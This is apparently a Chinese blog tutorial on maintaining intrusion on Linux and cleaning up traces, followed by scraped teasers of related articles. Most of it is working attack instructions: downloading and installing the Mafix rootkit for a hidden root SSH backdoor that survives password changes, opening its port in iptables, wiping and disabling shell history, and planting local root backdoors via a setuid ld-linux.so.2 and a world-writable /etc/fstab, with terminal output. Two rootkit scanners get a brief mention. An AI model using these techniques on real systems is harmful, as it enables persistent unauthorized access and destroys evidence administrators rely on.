linux入侵控制与痕迹清理

后门

(1)开机自动反弹shell

(2)linux后门

Rookit

目前常用的有:t0rn /mafix/enyelkm 等

mafix rootkit
Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。
URL:http://forum.eviloctal.com/attachment.php?aid=13419
安装及使用:
wget http://forum.eviloctal.com/attachment.php?aid=13419
tar zvxf mafix.tar.gz
cd mafix
chmod +x root
./root pass port

安装完成后,使用ssh 用户@IP -P 配置的端口,即可远程登录。

 netstat -tnl 也验证端口是开放的。之前解压文件的目录/home/mafix在编译完后自动消失,便于隐藏。

 现在就可以用root,加上新密码、端口进行登录了,即使管理员改了root的密码也可以登录。

若无法登录,检查Linux的防火墙是否关闭,或者是否把新端口加入iptables中:

iptables -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 端口 -j ACCEPT

痕迹清理

清理命令记录:

(1)仅清理当前用户: history -c

(2)使系统不再保存命令记录:vi /etc/profile,找到HISTSIZE这个值,修改为0

安全检测

Rkhunter

Rkhunter的中文名叫“Rootkit猎手”, 目前可以发现大多数已知的rootkits和一些嗅探器以及后门程序. 它通过执行一系列的测试脚本来确认服务器是否已经感染rootkits. 比如检查rootkits使用的基本文件, 可执行二进制文件的错误文件权限, 检测内核模块等等。

Chkrootkit

当然如果只是用Rkhunter检查扫描还是不够权威,再来安装一款检查下吧,chkrootkit 是一款小巧易用的Unix平台上的可以检测多种rootkit入侵的工具。它的功能包括检测文件修改、utmp/wtmp/last日志修改、界面欺骗(promiscuous interfaces)、恶意核心模块(maliciouskernel modules)。

相关链接

http://www.freebuf.com/articles/network/23665.html

http://www.myhack58.com/Article/html/3/8/2011/29132.htm

http://www.tuicool.com/articles/eIv22az

http://www.jb51.net/hack/5889.html

方法一:setuid的方法,其实8是很隐蔽。看看过程:
[[email protected] lib]# ls -l |grep ld-linux
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2
[[email protected] lib]# chmod s ld-linux.so.2
[[email protected] lib]# ls -l |grep ld-2.7.so
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
[[email protected] lib]#
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。 

普通用户登录,测试下权限: 

[[email protected] ~]$ whoami
xiaoyu
[[email protected] ~]$ /lib/ld-linux.so.2 `which whoami`
root
[[email protected] ~]$
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。 

方法二: 

看过程: 

[[email protected] etc]# chmod a w /etc/fstab
[[email protected] etc]# 

这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下 

[[email protected] ~]$ ls -l /etc/fstab
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab
[[email protected] ~]$ echo ‘test /mnt ext2 user,suid,exec,loop 0 0‘ >> /etc/fstab 

然后从本机把一个文件到目标机器上去,这里我们命名为test 

[[email protected] tmp]$ ls -l test
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test
[[email protected] tmp]$ mount test
[[email protected] tmp]$ cd /mnt
[[email protected] mnt]$ ls -l
total 18
drwx------ 2 root root 12288 2008-04-20 05:44 lost found
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root
[[email protected] mnt]$ ./root
sh-3.2#
看到了吧,从普通用户提升到root了。呵呵。
test这个文件baidu貌似木有上传功能撒,木办法传 

貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....

  

时间: 2024-10-06 06:39:57

linux入侵控制与痕迹清理的相关文章

【转载】linux入侵日志分析

日志也是用户应该注意的地方之一.不要低估日志文件对网络安全的重要作用,因为日志文件能够详细记录系统每天发生的各种各样的事件.用户可以通过日志文件 检查错误产生的原因,或者在受到攻击和黑客入侵时追踪攻击者的踪迹.日志的两个比较重要的作用是:审核和监测.配置好的Linux的日志非常强大.对于 Linux系统而言,所有的日志文件都在/var/log下.默认情况下,Linux的日志文件已经足够强大,但没有记录FTP的活动.用户可以通过修改 /etc/ftpacess让系统记录FTP的一切活动. Linu

Linux进程控制知识总结

目录 一:进程标识符(ID) 二:进程操作 2.1创建一个进程 2.2 fork函数出错情况 2.3创建一个共享空间的子进程 2.4退出程序 2.5设置进程所有者 三:执行程序 3.1 exec函数 3.2 执行解释器文件 3.3在程序中执行Shell命令 四:关系操作符 4.1等待进程退出 4.2 等待指定的进程 进程控制 -- 一步 一:进程标识符(ID) 进程ID是用来标识进程的编号,就像身份证一样.不同的进程有不同的ID,可以通过ID来查询进程.进程标识符的类型是pit_t,其本质是一个

Linux进程控制编程

一.获取ID #include<sys/types.h> #include<unistd.h> pid_t getpid(void)    获取本进程ID pid_t getppid(void)  获取父进程ID 父进程:现有进程中,创建新的进程. 例:getpid.c #include<stdio.h> #include<unistd.h> #include<stdlib.h> int main() { printf("PID=%d\

【Linux 入侵检测】

检查linux系统是否被入侵或者中毒的步骤? 一.检查操作系统 (1)检查带宽,查看网卡流量 (2)检查系统登录登出日志,安全日志,和/etc/passwd是否被修改过 (3)查看系统是否存在异常进程: pwdx -- 查看进程的路径: lsof  --  查看系统打开的库文件 百度异常进程的名字 (4)查看开机启动服务和定时任务: /etc/rc.local 和 crontab –l (5)分析系统日志 二.检查应用是否存在漏洞,检查应用的版本信息(日志和进程) 三.常用的入侵检测工具 PSA

Linux进程控制——exec函数族

原文:http://www.cnblogs.com/hnrainll/archive/2011/07/23/2114854.html 1.简介 在Linux中,并不存在exec()函数,exec指的是一组函数,一共有6个,分别是: #include <unistd.h> extern char **environ; int execl(const char *path, const char *arg, ...); int execlp(const char *file, const char

Linux进程控制程序设计

一.进程控制理论基础 进程:是一个具有一定独立功能的程序的一次运行活动.程序是静态的,程序在运行的时候是进程. 1.进程的特点: 动态性:区别于程序的显著特性 并发性:多个进程可以同时执行 独立性:独立的 异步性:进程与进程之间可以进行异步操作 2.进程三态: 进程的ID(PID):标志进程的唯一数字. 父进程ID(PPID) 启动进程的用户ID(UID) 3.进程互斥 进程互斥是指当有若干进程都要使用某一共享资源时,任何时刻最多允许一个进程使用,其他要使用该资源的进程必须等待,直到占用该资源者

(转)增加定时检测linux占用内存,及时清理功能

增加定时检测linux占用内存,及时清理功能 原文:http://www.voidcn.com/article/p-wnmannom-boa.html free -m 查看,发现内存跑满了. 再 top,然后按下shift+m,也就是按内存占用百分比排序,发现排在第一的进程,才占用7.9%. 但是总内存大小8G,竟然有5G都被使用了, 那是什么占用的呢? 百度了一下,据说是centos为了提高效率,把部分使用过的文件缓存到了内存里. 如果是这样的话,我又不需要这样的文件性能,那就可以释放.如下两

linux shell 脚本 历史文件清理脚本,按天,按月,清理前N天的历史文件,删除指定大小历史文件,历史文件归档清理

不知道大家那有没有要清理的这个事情.需要清理目录历史文件.可能后续也会有很多其他地方需要清理历史文件,可能会用到. 我这两天空闲写了个脚本,清理比较方便,有要进行清理的大量历史文件的话可以用. 脚本用到的命令只有linux才有,像solaris等就不支持,所以只能在linux上运行.如果是nas存储的话,可以挂载到一个linux主机上跑脚本清理. 另外,脚本查找文件用的是ls,但是ls也有最大文件的限度(大概10w以内),如果每天文件很多,每天都是10w+的,运行可能提示文件数过多无法ls. 还

入侵后痕迹清理

清理你入侵后的三个重要痕迹应用程序日志安全日志系统日志 DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小.安全日志文件:%systemroot%system32configSecEvent.EVT系统日志文件:%systemroot%system32configSysEvent.EVT应用程序日志文件:%systemroot%system32configAppEvent.EVTFTP日志默认位置:%systemroot%